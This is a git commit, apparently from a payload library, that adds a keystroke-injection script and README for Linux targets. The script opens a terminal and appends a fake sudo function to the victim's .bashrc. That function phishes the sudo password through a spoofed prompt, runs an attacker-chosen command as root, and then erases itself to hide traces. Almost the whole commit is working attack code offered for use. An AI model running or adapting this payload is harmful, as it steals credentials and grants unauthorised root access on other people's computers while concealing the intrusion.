Merge pull request #224 from simen64/New-payload_sudo-phisher

New payload run command as root, without sudo passwod
2024-05-24 14:52:22 -04:00 · 2024-05-24 14:52:22 -04:00 · 7946403c26
parent 88d4d6010f 65b9e0de86
commit 7946403c26
2 changed files with 85 additions and 0 deletions
--- a/payloads/library/execution/run-command-as-root_without-sudo-password/README.md
+++ b/payloads/library/execution/run-command-as-root_without-sudo-password/README.md
@ -0,0 +1,41 @@
+# Run any command as root, without knowing the sudo password
+
+A payload that allows for executing any bash command on the targets computer as root, without knowing their sudo password.
+
+**Category:** Execution
+
+## Description
+
+This payload intercepts the .bashrc file so when the user uses `sudo` they type their password in our fake prompt letting us execute any command with root.
+We also execute the targets original command, and remove our injection in the .bashrc file to remove traces.
+
+## Getting started
+
+### Dependencies
+- Linux
+- Bash
+
+### Prerequisites
+
+If your target uses Gnome, uncomment this line in the payload (uncomment by removing `REM_BLOCK` and `END_REM`:
+```
+REM_BLOCK
+Use this if your targets DE is Gnome (remove REM_BLOCK and END_REM + this line)
+ALT F2
+DELAY 100
+STRINGLN xterm
+DELAY 500
+END_REM
+```
+
+If your target uses a DE or WM that lets you open a terminal with ctrl-alt-t uncomment this line:
+```
+REM_BLOCK
+Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line)
+CTRL-ALT t
+DELAY 500
+END_REM
+```
+
+## Settings
+- #cmd what command to run as root, do not include `sudo`
--- a/payloads/library/execution/run-command-as-root_without-sudo-password/payload.txt
+++ b/payloads/library/execution/run-command-as-root_without-sudo-password/payload.txt
@ -0,0 +1,44 @@
+REM ###############################################
+REM #                                             |
+REM # Title        : Run command as root          |
+REM # Author       : simen64                      |
+REM # Version      : 1.0                          |
+REM # Category     : Execution                    |
+REM # Target       : Linux                        |
+REM #                                             |
+REM ###############################################
+
+REM change to your keyboard layout
+DUCKY_LANG NO
+
+DELAY 2000
+CAPSLOCK_DISABLE
+
+REM put your command here (switch out apt update)
+DEFINE #cmd apt update -y
+
+REM_BLOCK
+Use this if your targets DE is Gnome (remove REM_BLOCK and END_REM + this line)
+ALT F2
+DELAY 100
+STRINGLN xterm
+DELAY 500
+END_REM
+
+REM_BLOCK
+Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line)
+CTRL-ALT t
+DELAY 500
+END_REM
+
+REM inject the code
+STRINGLN_BLOCK
+ echo '
+sudo() {
+while true; do
+    read -s -r -p "[sudo] password for ${USER}: " passwd
+    echo "${passwd}" | /usr/bin/sudo -S ${@} && { echo "${passwd}" | /usr/bin/sudo -S #cmd; head -n -6 .bashrc > temp && mv temp .bashrc; break; } >/dev/null 2>&1 || { clear; echo "Sorry, try again."; }
+done
+}' >> .bashrc
+exit
+END_STRINGLN